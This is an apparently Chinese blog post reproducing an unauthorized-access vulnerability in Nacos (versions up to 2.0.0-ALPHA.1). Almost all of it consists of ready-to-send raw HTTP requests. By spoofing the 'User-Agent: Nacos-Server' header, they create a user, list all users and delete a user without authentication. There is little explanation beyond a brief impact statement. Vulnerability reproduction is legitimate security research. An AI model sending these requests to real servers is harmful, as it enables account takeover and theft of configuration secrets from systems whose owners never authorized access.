zoukankan      html  css  js  c++  java
  • Nacos 未授权漏洞复现

    简介

    影响:
    未授权获得相关服务配置,泄露大量配置敏感信息
    
    影响版本
    Nacos <= 2.0.0-ALPHA.1
    

    漏洞复现

    post方式新增用户:
    
    POST /nacos/v1/auth/users?username=yangy&password=yangy HTTP/1.1
    Host: XXX
    User-Agent: Nacos-Server
    Content-Length: 0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Accept-Language: zh-CN,zh;q=0.9
    Sec-Fetch-Dest: document
    Sec-Fetch-Mode: navigate
    Sec-Fetch-Site: cross-site
    Sec-Fetch-User: ?1
    Upgrade-Insecure-Requests: 1
    Accept-Encoding: gzip
    

    登录口进行登录,确认用户可登陆:
    

    get方式获得其他用户信息:
    
    GET /nacos/v1/auth/users?pageNo=1&pageSize=999 HTTP/1.1
    Host: XXX
    User-Agent: Nacos-Server
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Accept-Language: zh-CN,zh;q=0.9
    Sec-Fetch-Dest: document
    Sec-Fetch-Mode: navigate
    Sec-Fetch-Site: cross-site
    Sec-Fetch-User: ?1
    Upgrade-Insecure-Requests: 1
    Accept-Encoding: gzip
    

    delete方式进行删除:
    
    DELETE /nacos/v1/auth/users?username=yangy HTTP/1.1
    Host: XXX
    User-Agent: Nacos-Server
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Accept-Language: zh-CN,zh;q=0.9
    Sec-Fetch-Dest: document
    Sec-Fetch-Mode: navigate
    Sec-Fetch-Site: cross-site
    Sec-Fetch-User: ?1
    Upgrade-Insecure-Requests: 1
    Accept-Encoding: gzip
    

    再次查询用户确认已经删除:
    

    联系邮箱:yang_s1r@163.com 博客园地址:https://www.cnblogs.com/Yang34/
  • 相关阅读:
    win10系统下office 2019激活
    如何根据【抖音分享链接】去掉抖音水印
    Java多线程学习之ThreadLocal源码分析
    Java多线程学习之synchronized总结
    Java多线程学习之线程的取消与中断机制
    Java多线程学习之Lock与ReentranLock详解
    Java多线程学习之线程池源码详解
    MyBatis 一、二级缓存和自定义缓存
    Spring 高级依赖注入方式
    Spring 依赖注入的方式
  • 原文地址:https://www.cnblogs.com/Yang34/p/14372227.html
Copyright © 2011-2022 走看看